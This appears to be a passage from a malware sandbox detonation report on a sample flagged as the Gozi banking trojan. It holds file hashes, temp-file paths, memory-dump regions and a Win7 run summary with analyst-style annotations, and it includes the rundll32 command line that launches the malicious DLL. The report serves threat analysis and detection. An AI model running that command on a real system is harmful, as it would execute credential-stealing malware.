MD5 6f8e06d1ad44febd0d4dfe4a99c5f05e
SHA1 5f9c158171904a232caf803d24fa4fa7015a4fde
SHA256 334ac4dae1c1a10e99c62e512bcbeeb106464f174dcad24c92946da84f5c6048
SHA512 7042f7859cbc236d23b61605fcdae55e0ccab75e644719e6f8d4e23a2e0f5bc78377e88d0e820b0b66e45c066eb2b965abe0bdef2c8a819c4844946dce720cb7

\??\c:\Users\Admin\AppData\Local\Temp\wir3sxsr\wir3sxsr.cmdline

MD5 7b2ac1280e3cedc1bd1cb9f868ff2e49
SHA1 00da23403eb0007251f2fe79e231b2bfb42dd9cc
SHA256 3df138466db767f371e2fbc893a597a02cbeecdd2c19657d5a87b7732cd4ee1f
SHA512 ea336463ad7e705803c7526a73849e2826e079b703f83f19dab84a9fecb5c4b2d5819745fabdaba90c99155135898eceaa65dac32f7399b327a523afb4f7a150

\??\c:\Users\Admin\AppData\Local\Temp\wir3sxsr\wir3sxsr.0.cs

MD5 f940d18acdc4088474574ab02034b84d
SHA1 b4a132a7603699cb6faf9fd4057f14d18ed4b83d
SHA256 01b20e366874c9f04c18819e9076c68e80ae0bcb8354f7b5ae72e3d9f38e1aeb
SHA512 4d2f49205ab6012e0b5e3a5f12a514550cdbd556b3567626286b26869120ac6ccf3abc08fdd3e975a41c2bac0eddefd03fa262ecc52de03e959c25791432831a

\??\c:\Users\Admin\AppData\Local\Temp\wir3sxsr\CSC26E5B873B3C14D448ECCD3F23066F5F6.TMP

MD5 a0dd5ccd9606e01c3a69616112a4a084
SHA1 8921aa75327eaa7f181370a3a2c018281e1a92fc
SHA256 2ca4f823f27336c0341cc715e839b6ce9addaa579666b8f89c5be5e5e4c54c52
SHA512 10048f9c972bcb8abf697382fc3881bf11f4f8e4df5c5fd7fdaccda0506726b1877d35653ec934355e7c211e242eeceab709caaaf7dbd06b7f97fd185d406f07

C:\Users\Admin\AppData\Local\Temp\RES6CCE.tmp

MD5 e3314aef6101867f045040474361d994
SHA1 7fee4426539cc14088a21db48cdd1603411989de
SHA256 2b5039c4d44dcc7758e6e9d783aa5d0fb038224c135089b3eb80bd82789cf987
SHA512 db4e9f69e8641184e86885dc9ca3eb0d82bf2d259fea95ea2762949be4d333552c29031193a075ab62879faef8ec6e405399b19ed00ef6bbbc29580c32937b06

C:\Users\Admin\AppData\Local\Temp\wir3sxsr\wir3sxsr.dll

MD5 c8a97f1dc1f5f7d6a4c06d85b571fb6a
SHA1 df4baab1acfb310fc6902eaf21a10190276911e6
SHA256 ca3a662c0fcaf789658a69bd384676722dedb108e9b6ca54db9ad416151aaa99
SHA512 185514736165cb836059519f2624bd7dabbb4e608b8a5bcea81f14b6646804f4bd3283bc21fa2445c34c2cc3d067bbc821b0bfdc6244fbfe12f61599b7026be6

memory/804-193-0x00000000080F0000-0x0000000008193000-memory.dmp

memory/4208-199-0x000001ACF0FA0000-0x000001ACF0FDC000-memory.dmp

memory/3772-204-0x0000028FC9E40000-0x0000028FC9EE3000-memory.dmp

memory/1344-211-0x0000024AE4200000-0x0000024AE42A3000-memory.dmp

memory/3440-210-0x0000024550AD0000-0x0000024550B73000-memory.dmp

memory/4112-216-0x000001A2A7FA0000-0x000001A2A8043000-memory.dmp

memory/3772-226-0x0000028FC9840000-0x0000028FC9841000-memory.dmp

memory/2232-223-0x0000016F03410000-0x0000016F034B3000-memory.dmp

memory/3772-228-0x0000028FC9E40000-0x0000028FC9EE3000-memory.dmp

memory/3440-230-0x0000024550120000-0x0000024550121000-memory.dmp

memory/3440-232-0x0000024550AD0000-0x0000024550B73000-memory.dmp

memory/804-233-0x0000000000AC0000-0x0000000000AC1000-memory.dmp

memory/804-234-0x00000000080F0000-0x0000000008193000-memory.dmp

memory/1344-235-0x0000024AE4080000-0x0000024AE4081000-memory.dmp

memory/1344-236-0x0000024AE4200000-0x0000024AE42A3000-memory.dmp

memory/4112-237-0x000001A2A5DB0000-0x000001A2A5DB1000-memory.dmp

memory/4112-238-0x000001A2A7FA0000-0x000001A2A8043000-memory.dmp

memory/2232-239-0x0000016F03200000-0x0000016F03201000-memory.dmp

memory/2232-242-0x0000016F03410000-0x0000016F034B3000-memory.dmp

memory/3184-241-0x000001F225DB0000-0x000001F225E53000-memory.dmp

memory/3184-246-0x000001F225B70000-0x000001F225B71000-memory.dmp

memory/3184-247-0x000001F225DB0000-0x000001F225E53000-memory.dmp

memory/1344-248-0x0000024AE4200000-0x0000024AE42A3000-memory.dmp

memory/4844-250-0x0000000000B60000-0x0000000000BF8000-memory.dmp

memory/4844-253-0x0000000000B60000-0x0000000000BF8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EBE4.bin1

MD5 1d0b80729108e13e765fa8b5dbc325b0
SHA1 155a3f53b166d45c70f4444c2603b6ceb95d4f9e
SHA256 4078dfa5ba175d50a27b6f7d1eb134da661cf559038b601986bc27beddb3a59b
SHA512 f3adc98b8a9288f80bf023cb691cf4d8e78fa7fa5e6e22eced1c6dcec9ea0e842fef609a06c92d2cd3d7c572e60aaaa4bb0a5821ab987b53f8ac68561b240b94

C:\Users\Admin\AppData\Local\Temp\EBE4.bin1

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

These are the digests of a zero-byte file: this snapshot was taken while EBE4.bin1 was empty, consistent with the > redirect in the systeminfo command having truncated it before any output arrived. They match every empty file and must not be used as indicators.

memory/804-257-0x00000000080F0000-0x0000000008193000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EBE4.bin1

MD5 1b8cd7fcdf04c98cd645bef0eefb2cf4
SHA1 cdc096cf188ba6240896cb15c64008446e1bc26e
SHA256 4d5c6b07f98f91df9f3c52f77ab336ad3c58ed2e58ae70910e386e2dafc1af0b
SHA512 e43b8da32f4f5c09e0ce7644fd56bc5864cb93b5d195ffe03505a536c784877c0421ffffeea644fb49518ddb76b95684803018af2eb37d3da1ce766ec45d3a49

(recorded twice by the sandbox with identical digests)

Analysis: behavioral1

Detonation Overview

Submitted

2023-03-08 16:15

Reported

2023-03-08 16:17

Platform

win7-20230220-en

Max time kernel

70s

Max time network

35s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\63338a1c62335e2478ca4592fde772ead9637ec24ebd389f92a620c7b2651d2e.dll,#1

Signatures

Gozi

banker trojan gozi

Suspicious use of WriteProcessMemory

Events  Description                       Process -> Target
7       PID 2020 wrote to memory of 2012  C:\Windows\system32\rundll32.exe -> C:\Windows\SysWOW64\rundll32.exe

All seven events are the 64-bit rundll32.exe writing into the 32-bit copy it relaunched from SysWOW64, which is how rundll32 handles a 32-bit DLL and is not injection by the sample. The Win7 run went no further (no other processes, no network), so the process, registry and network behaviour described under behavioral2 was observed only on Win10.

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\63338a1c62335e2478ca4592fde772ead9637ec24ebd389f92a620c7b2651d2e.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\63338a1c62335e2478ca4592fde772ead9637ec24ebd389f92a620c7b2651d2e.dll,#1

Network

N/A

Files

memory/2012-54-0x0000000001F40000-0x0000000002F40000-memory.dmp

memory/2012-55-0x0000000000210000-0x0000000000216000-memory.dmp

memory/2012-56-0x0000000001F40000-0x0000000002F40000-memory.dmp

memory/2012-57-0x0000000001F40000-0x0000000002F40000-memory.dmp

memory/2012-59-0x0000000001F40000-0x0000000002F40000-memory.dmp

memory/2012-60-0x0000000001F40000-0x0000000002F40000-memory.dmp